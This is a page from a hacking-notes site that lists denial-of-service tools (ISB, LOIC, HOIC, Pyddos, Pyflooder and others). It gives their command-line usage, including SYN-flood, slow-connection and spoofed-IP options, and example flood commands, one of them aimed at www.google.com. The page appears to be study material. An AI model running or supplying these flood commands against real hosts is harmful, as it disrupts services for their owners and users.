🛠️
Ghoul's Den
WebsiteGhoulsec-Vault
  • Ghoul's Den
  • Index of Tools
  • Index of Links
  • Top Ports
  • Initial Environment Deployment
    • Python3 & Pip Installation
    • Docker 🛳
    • Setting up AWS CLI
    • Msfconsole
    • Netplan configuration & Cloudinit
    • Wordlist Generation - CEWL
    • Apache2 Server
  • Information Gathering & Recon Tools
    • GHDB : Google Hacking Database
    • Sherlock : Social Media Footprinting
    • Nslookup
    • Dig (Domain Information Groper)
    • Recon-ng
    • HTTrack & Web Data Extractor
    • Email Tracker Pro
    • Shodan
    • ARIN Website Registry
  • Network Scanning Enumaration & Vulnerability Detection Tools
    • NMAP & SuperENUM
    • Nmap
      • Target Specification
      • Host Discovery
      • Port Scanning Techniques
      • Port Specification & Scan Order
      • Service Version Detection
      • OS Detection
      • Nmap Scripting Engine
      • Timing & Performance
      • FW / IDS / IPS Evasion
      • Miscellaneous Options
    • Colasoft Packet Builder & Megaping
    • Global Network Inventory
    • LDAP Enumeration > Active Directory Explorer
    • NetBIOS Enumerator
    • SMBEagle
    • RPC Scan
    • Nikto - Web Application Scanner
    • Enum4Linux
  • File Sharing Enumeration
  • Cloud Computing
    • AAD Internals
    • AWS CLI & S3
    • Trivy Scanner
    • S3 Scanner
    • LazyS3
  • Cryptography & stegnography
    • Veracrypt
    • Cryptanalysis Tools
    • Whitespace Cryptography - Snow
    • Creating a Self signed certificate in IIS
    • Steghide & Stegcracker
    • snow
  • Wireless Attacks
    • Aircrack-ng
  • Mobile Attacks
    • PhoneSploit-Pro
    • AndroRAT
    • ADB
  • SQL Injection Vulnerability
    • SQLMap
    • DSSS
  • IOT & OT Hacking
  • Social Engineering
  • Honeypot & IDS
    • Cowrie Honeypot
  • Sniffing & DDos
    • Sniffing
      • Capturing Remote packets using Wireshark
      • Detecting Sniffing using Nmap
    • Denial of Service (Dos & DDos)
      • DDos Protection using DDos Guardian
  • Malware Attacks
  • Password Cracking & Windows exploitation tools
    • Hydra
    • John
    • Hashcat
    • CrackMapExec
    • Impacket
    • Powerview
    • BitsAdmin
    • Rubeus (Kerberoasting) & Winpeas
    • AD-DC Querying
    • mstsc - RDP
  • System hacking & buffer overflow
    • Responder
    • Reverse Shell Generator
    • Clearing Traces
  • Session Hijacking
    • Caido
    • Bettercap
  • Web Servers & Applications
  • Linux Fundamentals
    • Find Command
    • Grep Command
Powered by GitBook
On this page
  1. Sniffing & DDos

Denial of Service (Dos & DDos)

PreviousDetecting Sniffing using NmapNextDDos Protection using DDos Guardian

Last updated 4 months ago

ISB (Iam So Board) :


UltraDDos :


EagleDos (.py) :

## Usage : 
python3 eagle-dos.py

HOIC (High Orbit Ion Cannon) :


LOIC (Low Orbit Ion Cannon) :


Pyddos (Python based script) :


usage: ./pyddos -t [target] -p [port] -t [number threads]

options:
  -h, --help       show this help message and exit

options:

  -d <ip|domain>   Specify your target such an ip or domain name
  -t <float>       Set timeout for socket
  -T <int>         Set threads number for connection (default = 1000)
  -p <int>         Specify port target (default = 80) |Only required with pyslow attack|
  -s <int>         Set sleep time for reconnection
  -i <ip address>  Specify spoofed ip unless use fake ip
  -Request         Enable request target
  -Synflood        Enable synflood attack
  -Pyslow          Enable pyslow attack
  --fakeip         Option to create fake ip if not specify spoofed ip

Example:
    ./pyddos -d www.example.com -p 80 -T 2000 -Pyslow
    ./pyddos -d www.domain.com -s 100 -Request
    ./pyddos -d www.google.com -Synflood -T 5000 -t 10.0

Pyflooder (Python based script) :

python3 pyflooder.py <host> <port> <number of packets>
ISB DDOS Tool Interface
Ultra DDos
Setting up the target IP Address
Setting up the target Port
Settiung number of packets
setting threds & starting attacks
Visualizing attack